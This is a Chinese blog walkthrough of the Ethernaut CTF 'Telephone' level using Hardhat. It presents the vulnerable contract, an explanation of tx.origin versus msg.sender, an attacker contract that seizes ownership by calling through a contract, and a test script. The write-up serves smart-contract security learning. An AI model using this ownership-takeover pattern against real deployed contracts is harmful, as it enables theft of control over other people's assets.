用Hardhat闯关Ethernaut题4 -telephone

010

开坑使用Hardhat闯关Ethernaut CTF题,提高合约和测试脚本的能力,后续也会增加Paradigm CTF的闯关题目。

Telephone合约

任务:获取合约的所有权,也就是改变owner

// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

contract Telephone {
    address public owner;

    constructor() public {
        owner = msg.sender;
    }

    function changeOwner(address _owner) public {
        if (tx.origin != msg.sender) {
            owner = _owner;
        }
    }
}

这道题就是理解tx.originmsg.sender的区别:https://ethereum.stackexchange.com/questions/1891/whats-the-difference-between-msg-sender-and-tx-origin 也就是说msg.sender不一定是个人地址,有可能是合约地址,tx.origin一定是个人地址,一般在写合约尽量不要使用tx.origin,会判断失误出现bug。

解题思路:1.创建攻击合约;2.用攻击合约去调用changeOwner,满足tx.origin != msg.sender

攻击合约:

// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

interface Telephoneinterface {
    function changeOwner(address _owner) external;
}

contract AttackTelephone {
    Telephoneinterface telephone;
    address public owner;

    constructor(address _telephone) public {
        telephone = Telephoneinterface(_telephone);
        owner = msg.sender;
    }

    function attack() public {
        telephone.changeOwner(owner);
    }
}

测试脚本:

const { expect } = require("chai");
const { ethers } = require("hardhat");
const { MaxUint256 } = require("@ethersproject/constants");
const { BigNumber } = require("ethers");

describe("test", function () {
    var Telephone;
    var AttackTelephone;
    it("init params", async function () {
        [deployer, ...users] = await ethers.getSigners();
    });
    it("deploy", async function () {
        const TelephoneInstance = await ethers.getContractFactory("Telephone");
        Telephone = await TelephoneInstance.deploy();
        const AttackTelephoneInstance = await ethers.getContractFactory("AttackTelephone");
        AttackTelephone = await AttackTelephoneInstance.connect(users[0]).deploy(Telephone.address);
    });
    it("hack test", async function () {
        expect(await Telephone.owner()).to.equal(deployer.address);
        await AttackTelephone.attack();
        expect(await Telephone.owner()).to.equal(users[0].address);
    });
});

运行结果:

image.png

Github:hardhat测试仓库

本文参与区块链开发网 ,好文好收益,欢迎正在阅读的你也加入。

  • 发表于 2天前
  • 阅读 ( 88 )
  • 学分 ( 2 )
  • 分类:智能合约

,

© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
区块链
# Solidity# Hardhat
喜欢就支持一下吧
点赞0
分享
相关推荐
评论 抢沙发
区块链技术的头像-区块链开发网

昵称

取消
昵称

请填写用户信息:

  • 昵称(必填)
  • 邮箱(必填)
表情
[aoman][baiyan][bishi][bizui][cahan][ciya][dabing][daku][deyi][doge][fadai][fanu][fendou][ganga][guzhang][haixiu][hanxiao][zuohengheng][zhuakuang][zhouma][zhemo][zhayanjian][zaijian][yun][youhengheng][yiwen][yinxian][xu][xieyanxiao][xiaoku][xiaojiujie][xia][wunai][wozuimei][weixiao][weiqu][tuosai][tu][touxiao][tiaopi][shui][se][saorao][qiudale][se][qinqin][qiaoda][piezui][penxue][nanguo][liulei][liuhan][lenghan][leiben][kun][kuaikule][ku][koubi][kelian][keai][jingya][jingxi][jingkong][jie][huaixiao][haqian][aini][OK][qiang][quantou][shengli][woshou][gouyin][baoquan][aixin][bangbangtang][xiaoyanger][xigua][hexie][pijiu][lanqiu][juhua][hecai][haobang][caidao][baojin][chi][dan][kulou][shuai][shouqiang][yangtuo][youling]
代码

请输入代码:

确认
图片
热门
DAO 工具观测台-区块链开发网
123人已阅读
DAO 工具观测台
TOP1
十分钟开发一个混币-原理篇-区块链开发网
十分钟开发一个混币-原理篇
8月前41人已阅读
TOP2
零知识证明 - Plookup算法介绍-区块链开发网
零知识证明 – Plookup算法介绍
8月前29人已阅读
TOP3
Aptos钱包使用指南-区块链开发网
Aptos钱包使用指南
7月前25人已阅读
TOP4
以太坊可用RPC节点列表-区块链开发网
以太坊可用RPC节点列表
8月前25人已阅读
TOP5
零知识证明 - libsnark源代码分析-区块链开发网
零知识证明 – libsnark源代码分析
8月前21人已阅读
TOP6
区块链技术入门学习指引-区块链开发网
区块链技术入门学习指引
8月前21人已阅读
TOP7
回顾史上最大智能合约漏洞事件 — The DAO事件-区块链开发网
回顾史上最大智能合约漏洞事件 — The DAO事件
8月前20人已阅读
TOP8
HEALTH 事件分析-区块链开发网
HEALTH 事件分析
5月前18人已阅读
TOP9
如何在智能合约中调用另一个合约的函数-区块链开发网
如何在智能合约中调用另一个合约的函数
5月前16人已阅读
TOP10
猜你喜欢

15位国会议员要求SEC详细说明加密货币和ICO指导方针

区块链中的数学 – Amir Herzberg动态密钥共享

“白鲸”掌控比特币,买家最佳姿势是“HODL”

研究如何利用 Solidity 新操作码 Prevrandao 获取随机数

数字货币合规化进程大跨步,G20成员国联合签署协议

谁在70块一斤收矿机?

ubuntu添加新用户

科创板注册制要来 ,这会成区块链企业的盛宴吗?

为什么币圈高管仍然看好加密货币?

波卡平行链的插槽设计

最佳Web3.0案例–55个值得关注的Web3项目

The DeanBeat: 游戏行业应该如何应对经济衰退?

每周以太坊进展 2021/03/28

使用merkle tree空投,白名单验证

Aptos 中的智能合约形式化验证 | Move dApp 极速入门(七)

以太七日谈 • 2021/11/16

破解以太坊 EVM 谜题3

EIP2612: 通过链下签名授权实现更少 Gas 的 ERC20代币

智能合约语言 Solidity 教程系列5 – 数组介绍

八成市值蒸发 下跌仍未见底 红极一时的比特币究竟怎么了

最新

通过 NFTScan 实时监控钱包地址和 NFT 合约地址

Move语言安全性分析及合约审计要点之提案攻击

MEV 回调函数漏洞分析

Chainlink: 连接区块链生态的 Web3 服务平台

hardhat使用的rpc请求解读

平均价格算法:TWAP vs. VWAP

hackerdao攻击事件分析

AES攻击事件分析

以太七日谈 • 2022/12/13

指南:关于secp256k1、ECDH、ECDSA

解构Solidity合约 #1 – 字节码

DFX Finance攻击事件分析

ChainAegis分析报告:Dogecoin排名前10的市值从何而来?

SharkTeam完成APTOS生态项目NFMS的合约审计

区块链开发必备(3)—— Remix IDE 使用流程

如何入门智能合约开发

Iceberg-Trino 如何解决链上数据面临的挑战

解构 Solidity 合约 #2 – 函数选择器

BGLD 通缩代币漏洞分析

5 个步骤创建 Solana 代币

关键词
默克尔树黑客松黑客攻击黄皮书高效数据交互协议骗局风险评估预言机操控预言机预编译合约非对称加密静态分析零知识证明虚拟机零知识证明零知识零时科技隔离见证隐私计算隐私保护隐私交易隐私随机数阈值签名闪电贷攻击闪电贷闪电网络闪电攻击闪电兑门罗币链码链下门限签名链下扩容链上数据链上扩容钻石标准钱包接入钱包安全钱包钓鱼攻击金融科技量子计算重入攻击部署合约部署逻辑漏洞通道通证经济进展更新软件转账